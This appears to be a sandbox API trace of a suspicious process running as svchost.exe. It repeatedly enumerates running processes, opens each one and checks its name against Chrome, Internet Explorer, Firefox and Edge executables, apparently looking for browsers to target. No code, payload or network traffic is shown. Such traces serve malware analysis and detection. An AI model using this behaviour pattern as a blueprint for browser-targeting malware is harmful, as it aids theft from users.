	[0196.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.424] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.425] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.425] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.425] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.425] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0196.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x11a8
	[0196.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.426] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0196.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.427] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.427] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0196.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.427] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.427] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x11ac
	[0196.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.428] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.429] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.429] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.429] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.429] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.430] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0196.431] CloseHandle (hObject=0x188) returned 1
	[0196.431] Sleep (dwMilliseconds=0x64) 
	[0196.546] GetCurrentProcessId () returned 0x110
	[0196.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0196.548] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0196.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0196.550] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0196.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x11b0
	[0196.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.551] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.551] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.552] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.552] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.552] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x11b4
	[0196.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.553] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.553] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.553] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.554] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.554] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0196.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x11b8
	[0196.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.555] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0196.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.555] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.555] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0196.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.556] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.556] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x11bc
	[0196.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.556] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.557] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.557] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.557] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.558] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0196.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x11c0
	[0196.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.558] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0196.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.559] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.559] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0196.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.559] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.559] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0196.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x11c4
	[0196.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.560] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0196.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.561] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.561] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0196.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.561] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.562] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0196.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x11c8
	[0196.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.562] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0196.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.563] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.563] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0196.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.563] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.563] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0196.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x11cc
	[0196.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.564] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.564] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.565] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.565] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.565] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x11d0
	[0196.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.566] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.566] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.566] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.567] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.567] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x11d4
	[0196.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.568] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.568] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.568] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.569] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.569] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.569] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x11d8
	[0196.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.570] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.570] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.570] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.570] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.571] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x11dc
	[0196.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.571] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.572] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.572] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.572] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.573] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x11e0
	[0196.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.573] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.574] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.574] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.574] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.574] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x11e4
	[0196.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.575] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.576] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.576] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.576] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.576] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x11e8
	[0196.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.577] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.578] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.578] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.578] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.578] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0196.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x11ec
	[0196.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.579] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0196.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.579] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.580] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0196.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.580] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.580] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x11f0
	[0196.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.581] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.581] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.582] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.582] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.582] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0196.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x11f4
	[0196.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.583] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.583] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.584] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.584] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.584] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x11f8
	[0196.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.585] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.585] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.585] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.586] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.586] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x11fc
	[0196.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.587] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.587] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.587] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.588] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.588] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0196.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1200
	[0196.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.589] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0196.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.589] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.589] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0196.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.590] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
